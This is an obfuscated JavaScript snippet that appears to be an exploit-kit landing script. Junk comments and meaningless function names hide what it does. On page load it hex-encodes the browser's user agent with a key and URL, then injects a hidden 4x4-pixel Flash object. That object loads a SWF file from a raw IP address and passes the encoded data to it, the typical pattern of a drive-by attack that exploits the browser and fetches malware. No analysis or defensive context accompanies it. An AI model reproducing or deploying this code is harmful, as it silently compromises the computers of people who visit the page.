/*s47531d13273hssfj56471fs*/function hgfgerdfgdf(num, width){/*s46746d55677hfj39404fs*/var vcbcvbnfd = "0123456789abcdef";var hgfgghf = "";/*s17218d25764hfj70439fs*/var hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1);while (num > 0xF) {num = num >>> 4;hgfgerdfgdf = vcbcvbnfd.substr(num & 0xF, 1) + hgfgerdfgdf;}var width = (width ? width : 0); while (hgfgerdfgdf.length < width)hgfgerdfgdf = "0" + hgfgerdfgdf;return hgfgerdfgdf;}/*s67259d40655hfj49697fs*/function ghnvbn(u, k) {var fr=String.fromCharCode;var c="", b="", d="", f=fr(0x20), g=fr(0), v=fr(0x22);/*s1071d75661hfj74655fs*/var app=k+v+f+v+u+v+f+v+navigator.userAgent+v+g+g+g+g;app.length%2 && (app+=g);for (var e = 0; e < app.length; e++) {b = hgfgerdfgdf(app.charCodeAt(e),2);d = hgfgerdfgdf(app.charCodeAt(e+1),2);/*sdhd51661hfs*/c += b + d;/*s83865d14309hfj94494fs*/e += 1;}return c;}/*s14487dfsffd*/

	function hfdf(fus,asd)
	{
	var cvbfh = '<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd + '" />';
	cvbfh = cvbfh + '<!--[if !IE]>-->';
	cvbfh = cvbfh + '<object type="application/x-shockwave-flash" data="' + fus + '" allowScriptAccess=always width="4" height="4">';
	cvbfh = cvbfh + '<param name="movie" value="' + fus + '" />';
	cvbfh = cvbfh + '<param name="play" value="true"/>';
	cvbfh = cvbfh + '<param name=FlashVars value="menu=' + asd +   '" />';
	cvbfh = cvbfh + '<!--<![endif]-->';
	cvbfh = cvbfh + '<!--[if !IE]>--></object><!--<![endif]-->';
	cvbfh = cvbfh + '</object>';

	var ffert = document.createElement("div");
	ffert.innerHTML = cvbfh;
	document.body.appendChild(ffert);
	} 
	
	hfdf("http://188.225.36.42/?OTU3NjY1ODY=&pa=xHzQMrDYbR3FFYPfKPnEUKdEMU3WA0eKwYyZhazVF5-xFDfGpbL1Fx_spVydCF-EmvFvdLMHIwKh1UTASwR&ma=mnY9aVltF9Kj8ikCEnBeZh5aCqBfcMAtE95DHEbM53F-mmrAVIskglheBvWNYxegtWlsU4AsTnK_7VaOO-w&gift=Mjg1MTU2NDM=", ghnvbn("http://188.225.36.42/?ODc4Mzk2OTQ=&pa=xXzQMvWdbRXQCJ3EKvncT6NHMVHRHECL2Y-dmrHQefjaeVWkzrHFTF_yozKASwSG6_JtdfJSDQ&ma=Tgj0KELQdizopfAw8W9a6u20CEmBediMWH_xeJMggQ_sCXE-A42Qn9xrAkdMIlwRaE61ENjOse&gift=NDQ4NDk2MQ==","wexykukusw"));